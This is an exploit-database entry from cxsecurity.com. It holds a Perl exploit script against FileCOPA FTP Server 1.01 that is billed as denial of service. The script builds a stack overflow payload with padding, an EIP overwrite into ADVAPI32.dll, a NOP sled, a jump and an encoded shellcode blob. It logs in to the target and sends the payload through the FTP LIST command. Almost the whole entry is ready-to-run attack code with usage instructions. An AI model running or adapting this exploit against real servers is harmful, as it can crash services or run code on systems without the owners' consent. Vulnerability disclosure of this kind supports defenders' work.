FileCOPA FTP Server 1.01 Denial Of Service

2021.06.06
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

#!/usr/bin/perl # # e-mail: fernando.mengalli@gmail.com # # Date: 04/06/2021 # # Version Vulnerable: FileCOPA FTP Server 1.01 # # OS Tested: Windows XP PACK 3 Brazilian e Windows 2000 # # Youtube video: https://youtu.be/A9cEoyY9Bd4 # # badchars \0x00\0x0a use Net::FTP; use Term::ANSIColor; $sis="$^O"; print $sis; if ($sis eq "windows"){ $cmd="cls"; } else { $cmd="clear"; } system("$cmd"); if ((!$ARGV[0]) || (!$ARGV[1])) { &apresentacao(); } sub apresentacao { print q { ###################################################### # # # [*] FileCOPA FTP Server 1.01 - Denied of Service # # # # [*] Author: Fernando Mengali # # # # [+] Modo de uso: perl exploit.pl <IP> <Porta> # # # ################# Code Exploit ####################### } } our $alvo = $ARGV[0]; our $porta = $ARGV[1]; if (!$ARGV[0] && !$ARGV[1]) { exit; } if($alvo !~ /(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})/) { print color('red bold'); print " \n\n [-] Por favor, defina o IP alvo! \n\n"; color('reset'); exit; } if($porta < 0 || $porta > 65535) { print color('red bold'); print " \n\n [-] Por favor, defina uma porta de 1 a 65535! \n\n"; color('reset'); exit; } print color('green bold'); print "\n\nAlvo definido =>" .$alvo . " \n \n"; print "Porta definida =>" .$porta . "\n\n"; color('reset'); print color('yellow bold'); print "[+] Por favor, informe a nome de usuário: "; color('reset'); print color('red bold'); my $usuario = <stdin>; chomp($usuario); color('reset'); print color('yellow bold'); print "[*] Por favor, informe a senha de acesso: "; color('reset'); print color('red bold'); my $senha = <stdin>; chomp($senha); color('reset'); my $buf = "\xba\x17\x61\x66\xaf\xdb\xd9\xd9\x74\x24\xf4\x5d\x2b\xc9" . "\xb1\x60\x31\x55\x12\x83\xed\xfc\x03\x42\x6f\x84\x5a\xb7" . "\xa9\xf0\x15\x7b\xd9\xfb\x8f\xf7\x01\x08\x75\xdc\x80\x41" . "\xd3\x13\x51\xba\xe7\x11\x4d\x39\x25\x21\xb3\x27\x8b\x30" . "\xef\xf1\xac\xbd\x95\xe9\xcf\x1a\x1d\xb9\xe1\xf6\x27\x0b" . "\xff\x02\x98\xc0\xf6\xc7\x19\x52\xc4\x94\x18\xdb\x56\x20" . "\xb6\x9a\xc4\xb5\xec\xf3\x40\xd4\x19\x17\x6d\x35\x50\x3a" . "\x13\xc3\xb3\xf0\x38\x8d\xff\xc5\x05\x55\x33\xe7\xd2\x9e" . "\xb6\x8c\x9b\x79\xce\x8f\xd6\x30\x72\x12\x62\x26\x3e\xed" . "\xef\xda\x23\x88\x07\x74\xdc\xbe\xe1\xc4\x3e\x91\x8a\x26" . "\x3a\x3f\x2b\xf2\xe5\x3a\x18\x0f\xd0\x8d\x7b\xba\xf3\xba" . "\x2b\x5b\xa5\x2d\x54\xaa\x88\x68\x4b\xf4\xcc\x24\x68\xc1" . "\x19\x22\xf9\x08\xd6\x08\x8f\x4a\xe0\x7d\x67\xc1\x4e\xd8" . "\x08\x34\x44\x2b\x6a\x6f\x41\x6d\x53\x26\x73\x9d\xb4\xca" . "\x87\xed\xe6\x2d\x8b\x1c\x42\x0e\xb3\x20\xd0\xa1\x48\x97" . "\x45\x46\x26\x6b\xe7\x74\x52\xc1\xae\x2d\x8d\x1a\x06\xe0" . "\x24\x26\xbe\xfe\x26\xf8\x48\x75\x73\x5d\x6c\x67\xeb\xf4" . "\xf4\x08\x91\xf8\x5f\x4a\x3a\xd4\x5c\xd4\x7c\x52\x13\xa5" . "\x08\x06\xc9\x8b\x04\x9a\x0f\xe5\xe8\x1f\xef\x28\x3b\xe9" . "\x6e\xf9\xee\x7e\xf0\x5c\x5e\x4f\x95\x49\x0f\x83\xf0\x70" . "\x09\xf6\x83\xe9\x43\xb8\xe0\x88\x51\x6e\x9c\x5d\x48\x5b" . "\x9b\xca\x9a\xf1\x48\xa8\x51\x22\x61\x12\x55\xfe\x10\x16" . "\xb5\x42\x42\xff\x15\x14\x3f\x44\x9b\x92\xfc\xd9\x67\xe0" . "\x15\xd1\x64\xce\x75\xec\xa3\x08\x03\x61\x4a\x3b\x0e\x5a" . "\xb0\x7b\xe6\x2c\xac\xae\x5d\xad\x71\xf5\xb8\xc4\x4f\xd3" . "\xf4\x40\x2b\x92\x75\x83\xe3\x0f\x4c\x23\x78\x72\x0f\x22" . "\xb9\x10\xa6\x1d\xc9\xcb\xca\xe5\x61\xf8\x5f\x64\x86\x49" . "\x5b\xb2\x9e\x75\x30\xc6\x6e\x3c\x9a\x02\xad\x03\x36\x29" . "\xaf\x84\x62\x98\x22\xcd\xbf\x7e\xa2\x14\x97\x75\xa2\xc3" . "\xab"; $offset = "\x41"x320; $NOPS= "\x90"x3105; $JMP = "\xe9\xbf\x2c\xb0\xff"; # jmp para endereco de memória $EIP= "\x93\x79\x2e\x7c"; # Aqui o jmp na biblioteca ADVAPI32.dll $payload = $offset . $EIP . $NOPS . $JMP . $buf . "\r\n"; print color('cyan'); print "\n\n[+] Conectando para o servidor " . $alvo . ":" . $porta."... \n"; $ftp = Net::FTP->new($alvo, Debug => 0, Port => $porta) || die color('red')."\n[-] Não foi possível conectar. \n"; sleep(2); print "[+] Conectado!\n"; sleep(2); $ftp->login($usuario,$senha) || die color('red')."\n [-] Não pode conectar ou você derrubou: $!"; print "[+] Autenticando...\n"; sleep(2); print "[+] Autenticado com sucesso!\n\n"; sleep(2); print "[*] Sobrecarregando o servidor...\n\n"; sleep(2); $ftp->command("LIST A", $payload); color('reset'); print color('green bold'); print "[+] Servidor fora do ar!\n"; color('reset'); exit(0);


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top